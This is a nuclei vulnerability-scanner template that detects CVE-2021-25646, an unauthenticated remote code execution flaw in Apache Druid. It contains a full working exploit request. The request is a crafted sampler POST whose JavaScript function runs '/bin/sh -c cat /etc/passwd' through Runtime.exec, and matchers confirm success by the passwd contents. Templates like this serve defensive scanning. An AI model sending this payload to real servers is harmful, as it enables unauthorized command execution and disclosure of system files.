nuclei-templates/cves/2021/CVE-2021-25646.yaml

id: CVE-2021-25646

info:
  name: Apache Druid RCE
  author: pikpikcu
  severity: high
  description: |
    Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
    Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.    
  reference:
    - https://paper.seebug.org/1476/
    - https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E
    - http://www.openwall.com/lists/oss-security/2021/01/29/6
    - https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2021-25646
    cwe-id: CWE-732
  tags: cve,cve2021,apache,rce,druid

requests:
  - raw:
      - |
        POST /druid/indexer/v1/sampler HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
        "type":"index",
        "spec":{
           "ioConfig":{
              "type":"index",
              "firehose":{
                 "type":"local",
                 "baseDir":"/etc",
                 "filter":"passwd"
              }
           },
           "dataSchema":{
              "dataSource":"odgjxrrrePz",
              "parser":{
                 "parseSpec":{
                    "format":"javascript",
                    "timestampSpec":{

                    },
                    "dimensionsSpec":{

                    },
                    "function":"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\"/bin/sh`@~-c`@~cat /etc/passwd\".split(\"`@~\")).getInputStream()).useDelimiter(\"\\A\").next();return {timestamp:\"4137368\",OQtGXcxBVQVL: hTVCCerYZ}}",
                    "":{
                       "enabled":"true"
                    }
                 }
              }
           }
        },
        "samplerConfig":{
           "numRows":10
        }
        }        

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "application/json"
        part: header

      - type: word
        words:
          - "numRowsRead"
          - "numRowsIndexed"
        part: body
        condition: and

      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body